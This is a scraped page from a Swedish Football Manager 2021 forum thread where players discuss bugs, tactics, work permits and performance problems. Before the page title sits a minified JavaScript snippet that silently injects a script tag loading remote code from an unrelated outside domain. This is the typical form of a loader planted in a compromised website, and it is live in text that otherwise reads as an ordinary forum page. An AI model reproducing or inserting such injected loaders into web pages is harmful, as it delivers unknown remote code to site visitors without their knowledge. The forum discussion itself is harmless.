;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Den stora tråden om FM21 – Sida 7 – Football Manager 2021 – FMSweden Forum
Meny Stäng

Den stora tråden om...

Share:
Notifications
Clear all

[Klistrad] Den stora tråden om FM21

247 Inlägg
88 Users
182 Reactions
22.4 K Visningar
zXc
 zXc
(@zxc)
Estimable Member

@gigolo

Förstör inte det hela charmen med FM? 

SvaraCitera
(@clevz)
New Member

@armada Möjligt, men det har funkat i alla tidigare upplagor och även under betan. Så lite märkligt att det ändras helt plötsligt. Får testa runt lite och se vad som funkar och inte 🙂 

SvaraCitera
(@clevz)
New Member

Efter att ha spelat lite mer, både på min gamla och nya save, så känns det mer och mer som en form av bugg. Att hålla spelarna fräscha och motiverade är a och o enligt mig. Sedan uppdateringen jobbar man i motvind i varenda match när man inte lyckas motivera dem tillräckligt. Varenda spelare står som behärskad och en lila gubbe vad jag än säger i matchsnacket känns det som. 

SvaraCitera
(@anton_s)
New Member

Går det att ändra så man ser spelarnas kondition och matchskärpa i procent igen?

SvaraCitera
Andreas_N
(@andreas_n)
Eminent Member

@macccaflow

På 20 var det väl slumpen som styrde hur pass mjuk eller hård brexit man fick i sin save?

SvaraCitera
MacCcaFlow
(@macccaflow)
Eminent Member

@andreas_n

Mycket möjligt. Jag kom nog aldrig tillräckligt långt med de saves där Brexit slog hårt. Men det låter mycket möjligt som sagt.

Andreas_N reacted
SvaraCitera
(@lilleman)
New Member

Spelar med Everton, påbörjade precis 2a säsongen och märkte att inget lag kan registrera sina spelare utan alla spelar med spelare från ungdomslagen, någon mer som varit med om det? 

Måste nästan vara en bugg eftersom jag kan registrera mina spelare.

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@lilleman

I PL, menar du? Eller i någon cup? 

SvaraCitera
(@lilleman)
New Member

Det var i PL men alla registrerade sina spelare på deadline day ? Så alla förutom jag spelade med ungdomsspelare i 5 matcher ?

This post was modified 4 år sedan by LilleMan

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@lilleman

Måste ju var en bugg ? 

SvaraCitera
(@lilleman)
New Member

Tror det med, kan återkomma om det är likadant i säsong 3.

SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin

Postad av: @lilleman

Tror det med, kan återkomma om det är likadant i säsong 3.

Du vann alla matcher hoppas jag ? 

SvaraCitera
(@fasteddy)
Eminent Member

Någon som kommit fram till en fungerande taktik? 

SvaraCitera
Northwinds
(@northwinds)
Estimable Member

@fasteddy

Har en 4-2-3-1:a som har gjort mig obesegrad i två utav de senaste fyra eller fem säsongerna med Malmö FF i Allsvenskan. Den har fungerat fint och har tagit oss ut i Europa under samtliga år, dock mot de riktiga storklubbarna åker vi på redigt med däng.

Nu har jag startat upp en RTG där jag har börjat med Prespa i Div2VG. Efter sex matcher har vi vunnit fem och förlorat en. 19 gjorda mål och 11 insläppta. Visst, många insläppta men med en högre kvalitet i truppen, vilket det givetvis är i Malmö så kommer antalet insläppta vara betydligt lägre.

SvaraCitera
 Roth
(@roth)
New Member

Har lite problem med spelet. Det är väldigt segt framför allt när jag ska välja vilka extra datafiler jag ska använda. Klickar jag bort en fil så tar det flera minuter innan det är bortklickad. Trodde det berodde på att jag hade massa facepack och logos inlagda men samma problem fortfarande. Aldrig varit så på tidigare spel. När spelet sen är igång går det kvickt mellan dagarna. 

SvaraCitera
(@fasteddy)
Eminent Member

Kan någon hjälpa mig, jag vill ändra layout när man är in game. Jag kör med endast kommentator och vill se texten större. Hoppas ni förstår 🙂

SvaraCitera
(@fasteddy)
Eminent Member

@northwinds

Härligt! Kan man ladda hem den 🙂

SvaraCitera
Northwinds
(@northwinds)
Estimable Member

@fasteddy

https://www.mediafire.com/file/dhfkggw326121a0/Mot_s%25C3%25A4mre_motst%25C3%25A5nd.fmf/file

Den heter Mot sämre motstånd ´då tanken var att skapa en mer offensiv taktik än den jag redan körde på, men sanningen blev den att jag endast kör med denna nu.

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

Tycker 4-4-2 funkar overkligt bra på FM21. 

SvaraCitera
Armada
(@armada)
Trusted Member

Jäävlar så svårt det är med arbetstillstånd i detta spel eller är det bara jag? Spelar i Skottland och kan i princip endast värva britter. Sen värvade jag en belgare och i andra säsongen som han spelade så hipps vipps förlorade han hans arbetstillstånd.. Extremt jobbigt och tråkigt detta..... 

"Oi bruv, three pints a lagar and a pint a guiness." - Bret Clement's greeting to pretty much everyone.

SvaraCitera
Sida 7 / 13
Share: